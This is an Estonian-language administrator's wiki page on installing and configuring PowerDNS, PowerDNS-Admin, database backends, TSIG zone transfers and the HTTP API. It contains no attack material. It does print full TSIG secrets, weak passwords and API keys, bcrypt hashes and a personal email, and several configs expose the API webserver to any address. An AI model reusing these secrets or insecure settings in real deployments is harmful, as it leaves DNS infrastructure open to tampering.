# pdns_control notify <domain>

või näidatud ip aadressile

# pdns_control notify-host <domain> <ip-address>

===TSIG kasutamine===

Nimeserverite vahelise tsooniedastuse juures TSIG juurutamiseks tuleb esmalt tekitada võti

# pdnsutil generate-tsig-key from_dns_to_itm hmac-sha256
Generating new key with 64 bytes (this can take a while)
Nov 26 13:10:37 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Create new TSIG key from_dns_to_itm hmac-sha256 WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ==

kus

* TODO

ning seejärel võti ühe või enama tsooniedastusega seostada

# pdnsutil activate-tsig-key moraal.ee from_dns_to_itm master

Tulemus paistab nii

<pre>
# pdnsutil show-zone moraal.ee
Nov 26 14:09:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016112602 == 2016112602 (serial in the database)
Zone is not actively secured
Zone has following allowed TSIG key(s): from_dns_to_itm
Metadata items:
SOA-EDIT-API DEFAULT
TSIG-ALLOW-AXFR from_dns_to_itm
No keys for zone 'moraal.ee'.
</pre>

kontrolliks sobib kopeerida öeldes

$ dig @192.168.1.248 moraal.ee axfr -y "hmac-sha256:from_dns_to_itm:WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ=="

kusjuures vastuses on üks preudokirje lisaks

..
from_dns_to_itm. 0 ANY TSIG hmac-sha256. 1480164029 300 32 t96WhnpNiAiL5KHXa8UzNthM6/p3ciQptF3Br2ZfhFk= 3538 NOERROR 0
...

Väited

* Sama TSIG võtit saab kasutada mitme tsooni jaoks ja nii on mugavam nt NSD patternit kasutada
* tundub, et tsooni jaoks TSIG juurutamisega kaasneb, et tsooni kopeerimise ip piirang enam ei kehti (lubatud ip pealt pöördudes ei ole võtme esitamine vajalik)
* kui tsooni juures on tsig sisse lülitatud, siis see mõjub nii notify kui xfr jaoks
* TSIG pseudokirjete arv suureneb vastavalt tsooni mahu suurenemisele, https://tools.ietf.org/html/rfc2845 'The TSIG MUST be included on the first and last DNS envelopes. It can be optionally placed on any intermediary envelopes. It is expensive to include it on every envelopes, but it MUST be placed on at least every 100'th envelope.'

Alternatiiv on kasutada -y asemel -k suvandit ja argumendiks failinime, faili sisuga

<pre>
key "from_yks_to_teine" {
algorithm HMAC-SHA256;
secret "YY8xvlL6yGjrt1G4xlfLBaidQOFdvixHgRXN6tXUPMitEKZUs7kl7qixJ0nSN1bbDJQxaFGkoKkBamNS7EPXbw==";
};
</pre>

===API kasutamine===

Üle API muudatuse tegemiseks peab eelnevalt PowerDNS serveris lülitama API sisse ning sisemise webserver käivitama

# cat /etc/powerdns/pdns.conf
..
api=yes
api-key=apiparool
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24
...

ja kasutama nt sellist skripti (töökohaarvutis on seejuures abil kasutada nt jq utiliiti)

<pre>
# cat pdns-api.sh
curl -X PATCH --data \
'{"rrsets":
[{ "name": "www.moraal.ee.",
"records": [{ "content": "192.168.254.5", "disabled": false }],
"ttl": 86000,
"type": "A",
"changetype": "REPLACE"
}]
}' -H 'X-API-Key: midagisalajast123' http://192.168.1.248:8081/api/v1/servers/localhost/zones/moraal.ee. | jq .
</pre>

kus

* TODO

kas käivitamiseks öelda

$ sh pdns-api.sh

API'ga tutvumiseks võib olla hea mõte kuulata pealt mingi olemasoleva API-rakenduse ja serveri vahelist liiklust ja siis seda Wireshark abil uurida.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/httpapi/README/ - tundub, et süntaks pole seal kõigis näidetes päris korrektne

===PowerDNS kasutusstatistika===

PowerDNS sisaldab sisemist veebiserverit, mille käest saab küsida teenuse kasutusstatistikat, TODO.

===Logimine===

Tundub, et vaikimisi logitakse syslog'i.

===Varundamine ja taaste===

TODO

===Misc===

====Paigaldamine operatsioonisüsteemi paketihaldusest====

Paigaldamiseks sobib öelda, tuleb paigalda üldosa + mingi backend, nt BIND-ühilduvate tsoonifailide käsitlemise komponent (st failisüsteem)

# apt-get install pdns-server pdns-backend-bind

Tulemusena tekib failisüsteemi

* /etc/powerdns/pdns.conf - peamine seadistusfail

====MySQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====pdns-backend-mysql paigaldamine ja seadistamine====

Eeldusel, et MySQL baas juba töötab samas arvutis, sobib paigaldamiseks sobib öelda (seejuures kasutades db-config sistemat, mis paigaldamise käigus tekitab create database baasi, kasutaja, sätib privileegid jne)

# apt-get install pdns-backend-mysql
..
Determining localhost credentials from /etc/mysql/debian.cnf: succeeded.
dbconfig-common: writing config to /etc/dbconfig-common/pdns-backend-mysql.conf

Creating config file /etc/dbconfig-common/pdns-backend-mysql.conf with new version

Creating config file /etc/powerdns/pdns.d/pdns.local.gmysql.conf with new version
checking privileges on database pdns for pdns@localhost: user creation needed.
granting access to database pdns for pdns@localhost: success.
verifying access for pdns@localhost: success.
creating database pdns: success.
verifying database pdns exists: success.
populating database via sql... done.
dbconfig-common: flushing administrative password
Processing triggers for libc-bin (2.24-3) ...
Processing triggers for pdns-server (4.0.1-5) ...

Tulemusena

* tekitatakse MySQL kasutaja pdns
* tekitatakse MySQL create database pdns

====BIND backend kasutamine====

Tundub, et otsekoheselt failisüsteemis tsoonifaili redigeerimise teel on mõeldav töötada ainult BIND-formaadis backendiga. Muudega tuleks kasutada pdnsutil utiliiti või API liidest. Tsoonide nimekiri kirjeldatakse failis

# cat /etc/powerdns/named.conf
# Debian default: supermaster created zones are written here:
include "/var/lib/powerdns/supermaster.conf";
# Example for a manually configured slave zone:
#
zone "example.net" {
file "/var/lib/powerdns/zones.slave.d/example.net.zone";
type master;
masters { 192.0.2.53; };
};

Tsoon kirjeldatakse failis

# cat /var/lib/powerdns/zones.slave.d/example.net.zone
$TTL 180
@ IN SOA ns1.example.net. hostmaster.example.net. (
2014080705 ; Serial Number (date YYYYMMDD++)
86400 ; Refresh (24 hours)
1800 ; Retry (1/2 hour)
3600000 ; Expire (42 days)
21600) ; Minimum (6 hours)
IN NS ns1.example.net.
IN NS ns2.example.net.

@ IN A 192.168.0.15
IN MX 10 mail.example.net.
www IN A 192.168.0.15
mail IN A 192.168.0.2
ns1 IN A 10.1.1.171
ns2 IN A 10.1.1.172
imre IN A 10.1.1.173

Muudatuse kehtestamiseks

# pdns_control bind-reload-now example.net
example.net: parsed into memory at 2016-10-26 20:43:14 +0300

====PostgreSQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====BIND backend kasutamine====

pdns-backend-bind seadistatakse failist

# egrep -v "^$|^#" /etc/powerdns/pdns.d/bind.conf
launch+=bind
bind-config=/etc/powerdns/named.conf
bind-supermaster-config=/var/lib/powerdns/supermaster.conf
bind-supermaster-destdir=/var/lib/powerdns/zones.slave.d

kus

* /etc/powerdns/named.conf - tsoonide nimekiri
* /var/lib/powerdns/supermaster.conf - lihtsal juhul tühi
* /var/lib/powerdns/zones.slave.d - BIND formaadis tsoonifailide kataloog

Tsoonide haldamisega tegeleb edasi allpool olev punkt.

====Poweradmin====

Märkus: tõenäoliselt ei ole Poweradmin tarvkara kasutamine hea mõte kuna rakendus sodib otse PowerDNS andmebaasis ja 2016 aasta sügisel on hakanud tekkima paremaid alternatiive, nt nsedit.

Poweradmin kasutamiseks peab PowerDNS kasutama SQL andmebaasi ja Poweradmin peab töötama vastu sama andmebaasi. Tundub, et Poweradmin töötab paremini MySQL + PHP5 keskkonnas. Kui Poweradmin PHP rakendus töötab teises arvutis kui MySQL baas, sobib baasis öelda

mysql> grant all privileges on pdns.* to 'pdns'@'%' identified by 'dbconfig sisestatud parool';
mysql> grant all privileges on pdns.* to 'pdns'@'localhost' identified by 'dbconfig sisestatud parool';
mysql> flush privileges;

# pdns_control retrieve moraal.ee
Added retrieval request for 'moraal.ee.' from master 192.168.1.247

Kasulikud lisamaterjalid

* https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-powerdns-with-a-mariadb-backend-on-ubuntu-14-04

====Tsooni andmestikust otsing====

* Kõigi forward tsoonide sisust ip aadressi kasutamise leidmine

# for i in `pdns_control list-zones | grep -v All | grep -v in-addr`; do pdnsutil list-zone $i 2>&1 ; done | grep 10.20.123.154
ftp.moraal.ee 300 IN A 10.20.123.154

===2024 aasta kevade tähelepanekud===

Eesmärk

* ühe operatsioonisüteemi peal kompaktselt lahenduse pidamine - Debian v. 12
* dns server - PowerDNS
* webgui haldusliides - PowerDNS-Admin (PDA)
* dnssec võimekus
* docker abil kasutatakse konteinerit (PDA)
* andmeid hoitakse PostgreSQL andmebaasis

====Tööpõhimõte====

Väited

* dnssec kasutab algoritmi nr 13
* NSEC3 kasutab '1 0 0 -' seadistust
* sekundaarsete nimeserveritega suhtlemine toimub catalog-zones abil
* kasutatakse KSK/ZSK ja CSK lähenemist võtmete pidamisel

Protseduuride võimekus

* NSEC, NSEC3 ja NSEC3 param väärtuste muutmine
* võtme vahetus
* krüptimise algoritmi vahetus

====Platvormi ettevalmistamine====

Platvorm koosneb

* Debian v. 12 operatsioonisüsteem
* Docker Community Edition
* PostgreSQL v. 12
* NginX

PostgreSQL

<pre>
root@pdns:/tmp# apt-get install postgresql-common
root@pdns:/tmp# mkdir /etc/postgresql-common/createcluster.d
root@pdns:/tmp# echo "initdb_options = '--data-checksums'" > /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# echo "create_main_cluster = false" >> /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# apt-get install postgresql-16
root@pdns:/tmp# pg_createcluster --locale en_US.UTF-8 16 pgcluster_pdns_prod

postgres=# \x
Expanded display is on.
postgres=# \l postgres
List of databases
-[ RECORD 1 ]-----+------------
Name | postgres
Owner | postgres
Encoding | UTF8
Locale Provider | libc
Collate | en_US.UTF-8
Ctype | en_US.UTF-8
ICU Locale |
ICU Rules |
Access privileges |
</pre>

PowerDNS kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pdns login;
sql> \password pdns
sql> create database db_pdns owner = pdns;
</pre>

PowerDNS-Admin kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pda login;
sql> \password pda
sql> create database db_pda owner = pda;
</pre>

====PowerDNS paigaldamine====

PowerDNS ise ja tema tööks otseselt vajalikud komponendid (nt PostgreSQL andmebaas) töötavad nö tavalisel viisil operatsioonisüsteemi protsesside-teenustena st mitte-konteineritena.

<pre>
# apt-get install pdns-server pdns-backend-pgsql pdns-tools
</pre>

Tulemusena käivitatakse pdns server ja tema bind backend.

TODO

PostgreSQL backend kasutamine

<pre>
# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql
Password for user pdns:
CREATE TABLE
CREATE INDEX
CREATE INDEX
CREATE TABLE
CREATE INDEX
...
</pre>

Baasi ligipääs jms kirjeldatakse failis, https://doc.powerdns.com/authoritative/backends/generic-postgresql.html#

<pre>
root@pdns:~# egrep -v "^#|^$" /etc/powerdns/pdns.d/gpgsql.conf
launch+=gpgsql
gpgsql-dbname=db_pdns
gpgsql-dnssec=yes
gpgsql-host=127.0.0.1
gpgsql-password=parool
gpgsql-port=5432
gpgsql-user=pdns
</pre>

bind eemaldamiseks sobib kustutada fail

# rm /etc/powerdns/pdns.d/bind.conf

Tulemusena töötab pdns server, gpgsql backendiga

<pre>
2024-06-16T16:44:00.877817+03:00 pdns systemd[1]: Starting pdns.service - PowerDNS Authoritative Server...
2024-06-16T16:44:00.906026+03:00 pdns pdns_server[3916]: Loading '/usr/lib/x86_64-linux-gnu/pdns/libgpgsqlbackend.so'
2024-06-16T16:44:00.906356+03:00 pdns pdns_server[3916]: This is a standalone pdns
2024-06-16T16:44:00.906408+03:00 pdns pdns_server[3916]: Listening on controlsocket in '/run/pdns/pdns.controlsocket'
2024-06-16T16:44:00.906668+03:00 pdns pdns_server[3916]: UDP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906684+03:00 pdns pdns_server[3916]: UDP server bound to [::]:53
2024-06-16T16:44:00.906735+03:00 pdns pdns_server[3916]: TCP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906750+03:00 pdns pdns_server[3916]: TCP server bound to [::]:53
2024-06-16T16:44:00.906866+03:00 pdns pdns_server[3916]: PowerDNS Authoritative Server 4.9.1 (C) PowerDNS.COM BV
2024-06-16T16:44:00.906881+03:00 pdns pdns_server[3916]: Using 64-bits mode. Built using gcc 12.2.0 on May 28 2024 07:46:05 by root@localhost.
2024-06-16T16:44:00.906891+03:00 pdns pdns_server[3916]: PowerDNS comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it according to the terms of the GPL version 2.
2024-06-16T16:44:00.915255+03:00 pdns pdns_server[3916]: Polled security status of version 4.9.1 at startup, no known issues reported: OK
2024-06-16T16:44:00.926644+03:00 pdns pdns_server[3916]: Creating backend connection for TCP
2024-06-16T16:44:00.935773+03:00 pdns pdns_server[3916]: About to create 3 backend threads for UDP
2024-06-16T16:44:00.935850+03:00 pdns systemd[1]: Started pdns.service - PowerDNS Authoritative Server.
2024-06-16T16:44:01.086206+03:00 pdns pdns_server[3916]: Done launching threads, ready to distribute questions
</pre>

ühtegi tsooni ei ole kirjeldatud

<pre>
root@pdns:/tmp# pdnsutil list-all-zones
root@pdns:/tmp#
</pre>

====PowerDNS seadistamine====

Seadistamisel tegeldakse

* api sisselülitamine (PDA jaoks)
* SOA kirje vaikeväärtused
* DNSSEC vaike krüpto

====PowerDNS-Admin paigaldamine - PDA - docker====

PowerDNS-Admin tarvkara töötab docker konteinerina, aga kasutab host arvutist postgresql andmebaasi. Platvorm ettevalmistamine punktis on vajalik kasutaja ja create database tekitatud. PDA kasutamine eeldab, et PDNS juures on sisse lülitatud api liides (vaikimisi http liiklus üle port 8081).

Docker compose fail

<pre>
root@pdns:~# cat docker-compose-pda.yml
services:
svc_pda:
image: powerdnsadmin/pda-legacy:v0.4.2

container_name: cn_pda
restart: always
logging:
driver: json-file
options:
max-size: 50m
ports:
- "9191:80"
environment:
- SECRET_KEY='saladus'
- SQLALCHEMY_DATABASE_URI=postgresql://pda:pdaparool@192.168.10.53/pda
- GUNICORN_TIMEOUT=60
- GUNICORN_WORKERS=2
- GUNICORN_LOGLEVEL=DEBUG
- OFFLINE_MODE=False
- CSRF_COOKIE_SECURE=False

networks:
- nw_pda

networks:
nw_pda:
name: nw_pda
driver: bridge
</pre>

Käivitamiseks

# docker compose -f docker-compose-pda.yml up -d

Tulemusena on aadressil http://192.168.10.53:9191/ PDA webgui sisselogimise ekraan. Pressida Create Account ja esimesena tekitatud kasutaja on admin privileegidega.

TODO

====PowerDNS-Admin paigaldamine - NginX operatsioonisüsteem====

NginX https:// frontend kasutamiseks sobib kasutada sellist seadistust

<pre>
root@pdns:/etc/nginx/sites-enabled# cat /etc/nginx/sites-enabled/pdns
server {
listen 80;
server_name pdns.moraal.ee;
root /var/www/html;

if ($request_uri !~ /.well-known) {
return 301 https://pdns.moraal.ee/;
}
}

server {
listen 443 ssl http2;
server_name pdns.moraal.ee;
ssl_certificate /etc/ssl/localcerts/pdns.moraal.ee.pem;
ssl_certificate_key /etc/ssl/localcerts/pdns.moraal.ee.key;
ssl_session_timeout 1d;
ssl_session_cache shared:MozSSL:10m;
ssl_session_tickets off;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers off;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-CHACHA20-POLY1305;

client_max_body_size 25m;

ssl_stapling off;
add_header Strict-Transport-Security "max-age=63072000" always;

access_log /var/log/nginx/access-pdns.moraal.ee-443.log;
root /var/www/html;

location / {
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-Forwarded-Proto https;
proxy_pass http://192.168.10.53:9191;
}
}
</pre>

====PowerDNS-Admin paigaldamine - NginX docker====

<pre>
# cat /srv/pdns/volume/nginx/etc/nginx/nginx.conf
# nginx.conf

user nginx;
worker_processes auto;
error_log /dev/stderr;
pid /var/run/nginx.pid;

events {
worker_connections 1024;
}

http {
include mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /dev/stdout main;

sendfile on;
keepalive_timeout 65;

# Redirect HTTP to HTTPS
server {
listen 80;
server_name _;
return 301 https://$host$request_uri;
}

# HTTPS Configuration
server {
listen 443 ssl;
server_name _;
http2 on;
ssl_protocols TLSv1.3;
ssl_prefer_server_ciphers on;

ssl_certificate /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.crt;
ssl_certificate_key /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.key;

# Recommended security settings
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 10m;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305;

# Logging
access_log /dev/stdout;
error_log /dev/stdout;

# Reverse proxy to the destination
location / {
proxy_pass http://svc_pdns:8081;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
}
</pre>

====Misc====

Tulemusena saab pda webgui poole pöörduda aadressiga https://pdns.moraal.ee/.

PDA kasutaja parooli muutmine postgresql baasis, nb rakendus kasutab tabeli nimena 'user', see on postgresql nö built-in objekt ja name clash ületamiseks tuleb pöörduda rakendusega seotud ressursi poole "user" abil, eriti koos skeemi prefiksiga

<pre>
# su - postgres
$ psql db_pda
pda=# select * from public."user";
-[ RECORD 1 ]------------------------------------------------------------
id | 1
username | admin
password | $2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FF
firstname | Imre
lastname | Oolberg
email | imre.oolberg@auul.pri.ee
otp_secret |
role_id | 1
confirmed | f
..

db_pda=# update public."user" set password='$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC' where username='admin';
UPDATE 1
</pre>

kusjuures password väärtus tekitatakse nt

<pre>
$ htpasswd -bnBC 15 "" pdaparool | tr -d ':\n'
$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC
</pre>

Kasutaja lisamine

<pre>
db_pda=# insert into "user" (username, password, firstname, lastname, email, role_id, confirmed) values ('admin', '$2b$12$4M9qXQaWn95GTregvSO2v.I/1QQT0/Ayqt3jZsMp06FIa5dMme6Gu', 'Administrator', 'Administrator', 'priit@moraal.ee', 1, 'f');
</pre>

pdns api kontakti lisamine

<pre>
db_pda=# insert into setting (name, value) values ('pdns_api_url', 'http://192.168.10.80:8081');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_api_key', 'apiparool');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_version', '4.9.11');
INSERT 0 1
db_pda=# select * from setting;
id | name | value
----+--------------+------------------------
7 | pdns_api_url | http://192.168.10.80:8081
8 | pdns_api_key | apiparool
9 | pdns_version | 4.9.11
(3 rows)
</pre>

====PDA kasutamise privileegid====

Väited

* Account - grupi taoline moodustis, praktiliselt võiks vastata domeeni omanik asutusele
* User - kasutaja taoline moodustis, vastab inimesele kes süsteemi kasutab
* User ja Account vaheliste seoste abil saab anda hulgale kasutajatele õiguse tegeleda hulga domeenidega

<pre>
root@rv-xxx-01:/opt/pda/dc# docker exec -ti e8 sh
/app $ ps aux
PID USER TIME COMMAND
1 pda 0:00 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
7 pda 0:02 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
8 pda 0:01 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG

[2025-10-31 13:06:25,927] [record.py:61] ERROR - Cannot fetch zone's record data from remote powerdns api. DETAIL: HTTPSConnectionPool(host='rvxxx-01.test.moraal.ee', port=443): Max retries exceeded with url: /api/v1/servers/localhost/zones/imretest-03.ee (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1007)')))

volumes:
# - /opt/pda/volume/pda/etc/ssl/certs/ca-certificates.crt:/usr/lib/python3.10/site-packages/certifi/cacert.pem
</pre>

====PDA API liidese kasutamine====

Tsooni tekitamine

<pre>
$ curl -s -L -H 'Content-Type: application/json' -H 'Authorization: Basic xxx' -X POST https://pda.moraal.ee/api/v1/pdnsadmin/zones \
--data '{"name": "zone-moraal-imre-test-01.ee.", "kind": "MASTER", "nameservers": ["ans1.moraal.ee.", "ans2.moraal.ee."]}' | jq .
{
"account": "",
"api_rectify": false,
"catalog": "",
"dnssec": false,
"edited_serial": 2026010802,
"id": "zone-moraal-imre-test-01.ee.",
"kind": "Master",
"last_check": 0,
"master_tsig_key_ids": [],
"masters": [],
"name": "zone-moraal-imre-test-01.ee.",
"notified_serial": 0,
"nsec3narrow": false,
"nsec3param": "",
"rrsets": [
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee. hostmaster.moraal.ee. 2026010801 86400 7200 2419200 10800",
"disabled": false
}
],
"ttl": 3600,
"type": "SOA"
},
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee.",
"disabled": false
},
{
"content": "ans2.moraal.ee.",
"disabled": false
}
],
"ttl": 3600,
"type": "NS"
}
],
"serial": 2026010801,
"slave_tsig_key_ids": [],
"soa_edit": "",
"soa_edit_api": "DEFAULT",
"url": "/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee."
}
</pre>

Kui pole ligipääsu saab sellise vastuse

<pre>
% curl -s -L -H 'Content-Type: application/json' -H 'X-API-KEY: xxx' -X GET "https://pda.moraal.ee/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee" | jq .
{
"msg": "Zone access not allowed"
}
</pre>

===pdns docker lahendus===

<pre>
# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.1,192.168.10.0/24
allow-notify-from=
allow-unsigned-notify=yes
also-notify=
api=yes
api-key=saladus
default-api-rectify=yes
default-ksk-algorithm=ecdsa256
default-soa-content=ans1.auu.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600
disable-syslog=no
forward-notify=
include-dir=/etc/powerdns/pdns.d
launch=
local-address=172.30.0.15, 10.30.0.15
local-port=53
log-dns-details=yes
log-dns-queries=yes
log-timestamp=yes
loglevel=4
only-notify=
primary=yes
secondary=yes
webserver=yes
webserver-address=10.30.0.15
webserver-allow-from=0.0.0.0/0
webserver-loglevel=detailed
webserver-password=saladus
webserver-port=8081
</pre>

===pdns podman lahendus===

PDNS Quadlet Service kirjeldus

<pre>
kasutaja@ns-pdns-01:~$ cat .config/containers/systemd/pdns-01.container
[Unit]
Description=My PDNS Quadlet Service
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/powerdns/pdns-auth-49:latest
PublishPort=1053:8053/tcp
PublishPort=1053:8053/udp
ContainerName=pdns-01
Volume=%h/volume/pdns/etc/powerdns/pdns.conf:/etc/powerdns/pdns.conf:ro
Environment=PDNS_local_port=8053

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

ning pdns.conf seadistusfail

<pre>
# cat /opt/pdns/volume/pdns/etc/powerdns/pdns.conf
local-address=0.0.0.0
launch=
# include-dir=/etc/powerdns/pdns.d
api=yes
api-key=parool
webserver=yes
webserver-address=0.0.0.0
webserver-allow-from=0.0.0.0/0

#master=yes

primary=yes
secondary=yes
allow-axfr-ips= 100.20.21.0/24,127.0.0.1/32,172.17.0.0/16
also-notify=192.168.1.150
only-notify=
forward-notify=
default-soa-content=ans1.auul.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600

default-ksk-algorithm=ecdsa256
default-api-rectify=yes
# default-nsec3-param=1 0 0 -

launch+=gpgsql
gpgsql-dnssec=yes
gpgsql-extra-connection-parameters=password=parool dbname=db_pdns port=5432 user=pdns host=192.168.1.147
</pre>

===Tsooni migreerimine pädeva pdns peale===

====Protseduur====

TODO

====Käsundamine====

Tekitatakse migreeritava tsooni sekundaar

<pre>
# pdnsutil create-secondary-zone moraal.ee 192.168.1.148
</pre>

===Kasulikud lisamaterjalid===

* https://www.powerdns.com/
* http://www.poweradmin.org/
* https://github.com/PowerDNS/pdns/wiki/WebFrontends
* http://jpmens.net/2010/10/29/alternative-dns-servers-the-book-as-pdf/
* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/
* https://www.cloudflare.com/dns/dnssec/how-dnssec-works/

Podman kasutamine

2026-06-15T21:55:48Z